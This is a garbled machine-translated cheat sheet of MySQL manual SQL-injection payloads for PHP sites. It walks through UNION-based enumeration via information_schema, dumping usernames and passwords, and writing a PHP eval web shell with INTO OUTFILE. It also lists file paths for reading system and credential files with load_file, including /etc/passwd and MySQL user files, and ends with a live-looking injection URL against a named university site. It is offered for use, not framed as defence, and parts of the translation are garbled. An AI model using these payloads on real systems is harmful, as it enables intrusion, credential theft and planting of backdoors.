Php+mysql Manual Injection statement Daquan recommended _php Skills

Burst field length

ORDER BY num/*

Matching fields

and 1=1 Union Select 1,2,3,4,5.......n/*

Storm field position

and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to storm database information

Version () database () User ()

No guessing available field Storm database information (some sites do not apply):

and 1=2 UNION ALL Select Version ()/*

and 1=2 UNION ALL Select Database ()/*

and 1=2 union ALL Select User ()/*

Operating System Information:

and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:

and Ord (Mid (User (), 1, 1)) =114/* Returns the normal description as root

Bauku (mysql>5.0)

MySQL more than 5 has built-in library information_schema, storage of MySQL all the database and table structure information

and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table

and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hexadecimal) limit 0 (start record, 0 is first start record), 1 (show 1 Records)-

Guessing field

and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hexadecimal) limit 0,1

Mob password

and 1=2 Union Select 1,2,3, username segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage ( One available field displays two data contents):

Union Select 1,2,3concat (username segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)

Conditions: 1, know the site physical path

2, have sufficient permission (can use Select .... from Mysql.user test)

3, MAGIC_QUOTES_GPC () =off

Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '

and 1=2 union ALL Select a Word hex value into outfile ' path '

Load_file () Common path:

1, replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2. Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (+), char (32))
The top two are to view the full display code in a php file. Some times do not replace some characters, such as "<" replaced by "space" to return to the Web page. And you can't see the code.
3, Load_file (char (47)) can list the Freebsd,sunos system root directory
4,/etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf view Linux Apache virtual Host configuration file
5, C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view the Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development of the website Resin file configuration information.
7, c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf view the Linux system configuration JSP virtual host
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
Ten 、.. /themes/darkblue_orange/layout.inc.php phpMyAdmin Explosion Path
11. C:\windows\system32\inetsrv\MetaBase.xml View the IIS virtual host configuration file
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin configuration file View
13,/usr/local/resin-pro-3.0.22/conf/resin.conf-ditto
14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view
15,/etc/sysconfig/iptables to see the firewall strategy
16, Usr/local/app/php5 B/php.ini PHP is quite set
17,/etc/my.cnf mysql configuration file
18, the system version of/etc/redhat-release Red Hat
19, C:\mysql\data\mysql\user. MYD exists a user password in the MySQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21,/USR/LOCAL/APP/PHP5 B/php.ini//php Related Settings
22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//virtual Site Settings
23,C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini

website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (), char (32))

Note:

Char ( < )

Char (in) denotes a space

Problems with manual injection:

When the injection page shows:

Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '

such as:Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_ File (0x433a5c626f6f742e696e69), 3,4,user ()%20

This is due to inconsistent coding,

Workaround: Add Unhex (Hex (parameters)) to the parameter before it is ready. The above URL can be changed to:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex ( Hex (Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20

Can continue to inject ...